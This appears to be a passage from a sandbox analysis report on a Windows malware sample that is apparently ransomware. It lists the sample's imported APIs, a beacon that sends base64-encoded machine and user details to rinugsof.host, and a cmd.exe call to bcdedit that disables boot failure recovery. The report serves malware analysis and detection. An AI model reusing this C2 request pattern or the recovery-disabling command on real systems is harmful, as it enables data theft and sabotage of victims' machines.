Get Address	c:\windows\syswow64\kernel32.dll	function = FindResourceW, address_out = 0x75ea4aa0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeW, address_out = 0x75efeed0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetWindowsDirectoryW, address_out = 0x75ea5730	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Wow64DisableWow64FsRedirection, address_out = 0x75ea6b30	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x75efed10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x75eff3b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeInformationW, address_out = 0x75eff020	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetPriorityClass, address_out = 0x75ea65c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleWindow, address_out = 0x75ee9b20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x75efed70	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x75efedf0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x75efee40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x75ea6760	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x75efef40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x75eff090	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x75ea50d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileAttributesW, address_out = 0x75eff100	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MoveFileExW, address_out = 0x75ea4370	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x75ea5ae0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x75ea5090	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDriveStringsW, address_out = 0x75efefb0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenMutexW, address_out = 0x75efebf0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexW, address_out = 0x75efeb70	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenW, address_out = 0x75ea6c70	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatW, address_out = 0x75ee71a0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemInfo, address_out = 0x75ea54d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x75efeab0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x75eff180	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SizeofResource, address_out = 0x75ea6740	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadResource, address_out = 0x75ea5b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x75ea5010	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnregisterWaitEx, address_out = 0x75ea6910	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryDepthSList, address_out = 0x77c152d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedPopEntrySList, address_out = 0x77bf5840	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReleaseSemaphore, address_out = 0x75efec30	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtect, address_out = 0x75ea6a30	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x75ea69d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x75ea6970	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExW, address_out = 0x75ea56f0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleA, address_out = 0x75ea50b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetThreadTimes, address_out = 0x75ea55e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnregisterWait, address_out = 0x75edc850	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x75ea3cb0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x75efea10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x75ea5b40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x75eff120	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LockResource, address_out = 0x75ea5bc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x77bfb2d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77bfb250	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x77bdfb90	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEvent, address_out = 0x75efec50	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ResetEvent, address_out = 0x75efec40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObjectEx, address_out = 0x75efecb0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x75efeb30	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x75ea51b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x75ea5960	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x75ea5930	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x75ea68d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetUnhandledExceptionFilter, address_out = 0x75ea6720	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStartupInfoW, address_out = 0x75ea5320	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceCounter, address_out = 0x75ea5da0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x75efea20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThreadId, address_out = 0x75ea8820	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimeAsFileTime, address_out = 0x75ea5530	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeSListHead, address_out = 0x77c16680	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x75ea67e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x75ea6b10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x75ea5c40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStringTypeW, address_out = 0x75ea53b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DuplicateHandle, address_out = 0x75efeac0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x75ea8810	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetExitCodeThread, address_out = 0x75ea4ff0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TryEnterCriticalSection, address_out = 0x77c0aae0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EncodePointer, address_out = 0x77c129e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DecodePointer, address_out = 0x77c11ec0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x75ea4f00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionAndSpinCount, address_out = 0x75efebb0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsAlloc, address_out = 0x75ea6820	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsGetValue, address_out = 0x75ea6850	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsSetValue, address_out = 0x75ea6870	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsFree, address_out = 0x75ea6830	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x75efdd50	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringW, address_out = 0x75ea4430	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringW, address_out = 0x75ea5a60	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoW, address_out = 0x75ea5040	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCPInfo, address_out = 0x75ea4d10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RaiseException, address_out = 0x75ea5e20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RtlUnwind, address_out = 0x75ea7c10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x75ea4c40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryExW, address_out = 0x75ea5ac0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedPushEntrySList, address_out = 0x77bf2810	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedFlushSList, address_out = 0x77c12a20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleExW, address_out = 0x75ea5110	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameA, address_out = 0x75ea5070	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x75ea5330	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineA, address_out = 0x75ea4cb0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineW, address_out = 0x75ea4cc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetACP, address_out = 0x75ea4ca0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x77bf2dc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x75ea46b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitThread, address_out = 0x77c16390	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryAndExitThread, address_out = 0x75ea4c60	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x75ea57f0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77bef630	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileType, address_out = 0x75efef60	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocale, address_out = 0x75ea5a00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLCID, address_out = 0x75ea56a0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesW, address_out = 0x75ea49c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileExA, address_out = 0x75efedc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileA, address_out = 0x75efee20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidCodePage, address_out = 0x75ea59c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetOEMCP, address_out = 0x75ea5160	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentStringsW, address_out = 0x75ea4eb0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeEnvironmentStringsW, address_out = 0x75ea4c20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEnvironmentVariableA, address_out = 0x75ea64c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x75ea51f0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetStdHandle, address_out = 0x75ea6620	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSize, address_out = 0x77c0a790	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x75efee70	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleCP, address_out = 0x75eff440	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleMode, address_out = 0x75eff450	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x75eff130	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteConsoleW, address_out = 0x75eff500	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateTimerQueue, address_out = 0x75ea46e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SignalObjectAndWait, address_out = 0x75ea8120	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SwitchToThread, address_out = 0x75ea6790	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadPriority, address_out = 0x75ea66c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetThreadPriority, address_out = 0x75ea5610	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalProcessorInformation, address_out = 0x75ea71b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateTimerQueueTimer, address_out = 0x75ea46f0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ChangeTimerQueueTimer, address_out = 0x75ea43f0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteTimerQueueTimer, address_out = 0x75ea4780	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetNumaHighestNodeNumber, address_out = 0x75ea75e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessAffinityMask, address_out = 0x75ee3230	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadAffinityMask, address_out = 0x75ee6e40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RegisterWaitForSingleObject, address_out = 0x75edc7d0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x761cfbc0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x761ced60	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyW, address_out = 0x761cf460	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x761ce580	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptEncrypt, address_out = 0x761e2cf0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGenRandom, address_out = 0x761d0730	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyKey, address_out = 0x761cfa60	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetUserNameW, address_out = 0x761cf890	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x761cfa40	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x761cf530	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x761ce5a0	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptImportPublicKeyInfo, address_out = 0x7496cfe0	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptStringToBinaryW, address_out = 0x7495ceb0	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptDecodeObjectEx, address_out = 0x74985e90	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptBinaryToStringW, address_out = 0x7495c670	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetOpenEnumW, address_out = 0x73172790	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetEnumResourceW, address_out = 0x73172410	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetCloseEnum, address_out = 0x73172640	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = ShowWindow, address_out = 0x74ba3ee0	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SystemParametersInfoW, address_out = 0x74b9f210	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenW, address_out = 0x72fbe9e0	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpSendRequestW, address_out = 0x72fc9490	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoW, address_out = 0x730286e0	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x72fad000	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpOpenRequestW, address_out = 0x7301bdd0	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x72fd3a70	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetConnectW, address_out = 0x72fae000	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = InitializeCriticalSectionEx, address_out = 0x74f97060	2	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = FlsAlloc, address_out = 0x74f9bea0	2	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = FlsSetValue, address_out = 0x74f92550	2	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = FlsGetValue, address_out = 0x74f870c0	2	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = LCMapStringEx, address_out = 0x74f7ed00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeConditionVariable, address_out = 0x77c13a00	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SleepConditionVariableCS, address_out = 0x7500fca0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WakeAllConditionVariable, address_out = 0x77c18a90	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x75ea4ae0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x75ea4b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x75ea4b20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x75ea4b40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x75efebc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitOnceExecuteOnce, address_out = 0x74f95550	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventExW, address_out = 0x75efeb20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreW, address_out = 0x75efeb90	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x75efeb80	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x75ea6d30	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x77bfd7c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x77bfb840	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x77bfb740	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x75ea6d70	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolWait, address_out = 0x77bfc0b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x77bfbe10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x77c22b20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x77c18e50	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x77c152f0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x75ea4510	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentPackageId, address_out = 0x74f9e260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount64, address_out = 0x75ea0db0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandleEx, address_out = 0x75ea43d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileInformationByHandle, address_out = 0x75eff110	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimePreciseAsFileTime, address_out = 0x75eff1e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WakeConditionVariable, address_out = 0x77c88c50	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeSRWLock, address_out = 0x77c13a00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AcquireSRWLockExclusive, address_out = 0x77bf58e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TryAcquireSRWLockExclusive, address_out = 0x77c72ce0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReleaseSRWLockExclusive, address_out = 0x77bf83a0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SleepConditionVariableSRW, address_out = 0x7500fcf0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWork, address_out = 0x75ea6db0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SubmitThreadpoolWork, address_out = 0x77bfeb00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWork, address_out = 0x77bfed50	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringEx, address_out = 0x75ea7050	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x75ea7190	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x75ea7480	1	Fn
Get Address	c:\windows\syswow64\kernel.appcore.dll	function = GetCurrentPackageId, address_out = 0x75ba3510	1	Fn

User (1)

Operation	Additional Information	Success	Count	Logfile
Get Username	user_name_out = FD1HVy		1	Fn

System (4)

Operation	Additional Information	Count	Logfile
Get Time	type = System Time, time = 2019-05-23 20:39:47 (UTC)	1	Fn
Get Time	type = Performance Ctr, time = 13235119190	1	Fn
Get Info	type = Hardware Information	1	Fn
Get Info	type = Windows Directory, result_out = C:\WINDOWS	1	Fn

Mutex (2)

Operation	Additional Information	Success	Count	Logfile
Create	mutex_name = 1506877342345		1	Fn
Open	mutex_name = 1506877342345, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE		1	Fn

Environment (1)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		1	Fn Data

Debug (1)

Operation	Process	Additional Information	Success	Count	Logfile
Print	c:\users\fd1hvy\desktop\ckoufc.exe	type = DEBUG_STRING, text = GET /seniorita?bs=MTUwNjg3NzM0MjM0NTtXaW5kb3dzIDEwIFBybyBVc2VyTmFtZTogRkQxSFZ5O25vcmRmb3hAdHV0YW5vdGEuY29t HTTP/1.1 Accept: text/* User-Agent: Random String Host: rinugsof.host		1	Fn

Network Behavior

HTTP Sessions (1)

Information	Value
Total Data Sent	183 bytes
Total Data Received	802 bytes
Contacted Host Count	1
Contacted Hosts	185.117.119.95

HTTP Session #1

Information	Value
Server Name	rinugsof.host
Server Port	80
Username	-
Password	-
Data Sent	183 bytes
Data Received	802 bytes

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Random String, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = rinugsof.host, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP/1.1, target_resource = seniorita?bs=MTUwNjg3NzM0MjM0NTtXaW5kb3dzIDEwIFBybyBVc2VyTmFtZTogRkQxSFZ5O25v cmRmb3hAdHV0YW5vdGEuY29t , accept_types = 1701000, flags = INTERNET_FLAG_NO_COOKIES	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = rinugsof.host/seniorita?bs=MTUwNjg3NzM0MjM0NTtXaW5kb3dzIDEwIFBybyBVc2VyTmFtZTogRkQxSFZ5O25v cmRmb3hAdHV0YW5vdGEuY29t	1	Fn
Read Response	size = 1023, size_out = 451	1	Fn Data
Read Response	size = 1023, size_out = 0	1	Fn
Query HTTP Info	flags = HTTP_QUERY_FLAG_REQUEST_HEADERS, HTTP_QUERY_RAW_HEADERS_CRLF	1	Fn
Query HTTP Info	flags = HTTP_QUERY_FLAG_REQUEST_HEADERS, HTTP_QUERY_RAW_HEADERS_CRLF, size_out = 366	1	Fn Data
Close Session	-	1	Fn

Process #3: cmd.exe

Information	Value
ID	#3
File Name	c:\windows\system32\cmd.exe
Command Line	/C bcdedit /set {default} bootstatuspolicy ignoreallfailures
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:00:49, Reason: Child Process
Unmonitor	End Time: 00:00:55, Reason: Self Terminated
Monitor Duration	00:00:06

OS Process Information

Information	Value
PID	0xf04
Parent PID	0x47c (c:\users\fd1hvy\desktop\ckoufc.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x F08 0x 6CC

Host Behavior

File (15)

Operation	Filename	Additional Information	Count	Logfile
Get Info	C:\Users\FD1HVy\Desktop	type = file_attributes	2	Fn
Open	STD_OUTPUT_HANDLE	-	8	Fn
Open	STD_INPUT_HANDLE	-	5	Fn

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 4, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\WINDOWS\system32\bcdedit.exe	os_pid = 0x540, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL		1	Fn

Module (8)

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\cmd.exe	base_address = 0x7ff7b8240000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x7ff92fdd0000	2	Fn
Get Filename	-	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 32743	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x7ff92fdea990	1	Fn
